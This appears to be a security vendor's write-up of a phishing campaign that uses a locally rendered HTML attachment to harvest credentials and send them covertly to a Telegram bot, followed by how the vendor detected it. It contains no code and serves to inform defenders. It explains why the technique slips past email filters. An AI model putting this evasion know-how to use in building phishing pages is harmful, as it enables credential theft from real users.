HTML Attachment Renders Local Phishing Page and Exfiltrates Credentials via Telegram
Attack Overview
Step 1: Email
The attack starts with an email containing an HTML attachment and a vague message referencing a remittance payment. There are no links in the body of the message—only a single attachment: SWIFT_COPY.html.
- Email passes SPF, DKIM, and DMARC checks.
- Message contains no suspicious links.
- A single HTML attachment is used to initiate the attack.
Step 2: Local Phishing Interface
Opening the HTML file launches a local web page mimicking a document sharing login prompt. The page is rendered entirely on the user’s device to avoid network detection.
- The page mimics a legitimate login interface.
- Operates without external content or requests.
- Target is prompted to enter email and password.
Step 3: Redirection + Exfiltration via Telegram
After the target submits their credentials, they are redirected to a decoy OneDrive page hosting a harmless PDF. Meanwhile, their credentials, IP address, and geolocation are silently sent to a Telegram bot via the Telegram API.
- Target lands on a decoy file download page.
- Credentials and metadata are exfiltrated covertly.
- Telegram is used as the exfiltration channel.
How Does This Attack Bypass Email Defenses?
This email attack bypasses traditional security solutions for several reasons, including:
- The HTML file is rendered locally and does not generate external requests.
- The attachment appears benign and contains no links or malware.
- Exfiltration occurs via Telegram API, a legitimate communication platform.
How Did Abnormal Detect This Attack?
This attack was detected using AI and ML by analyzing various factors, including:
- Sender behavior and email context anomalies.
- Attachment analysis that revealed HTML smuggling techniques.
- NLP flagged the vague financial message as a phishing indicator.
By recognizing established normal behavior and detecting these abnormal indicators, a modern email security solution has the ability to prevent this attack from reaching inboxes.
Please note the exact detection mechanism from Abnormal Security's system might include proprietary techniques and methodologies not disclosed here.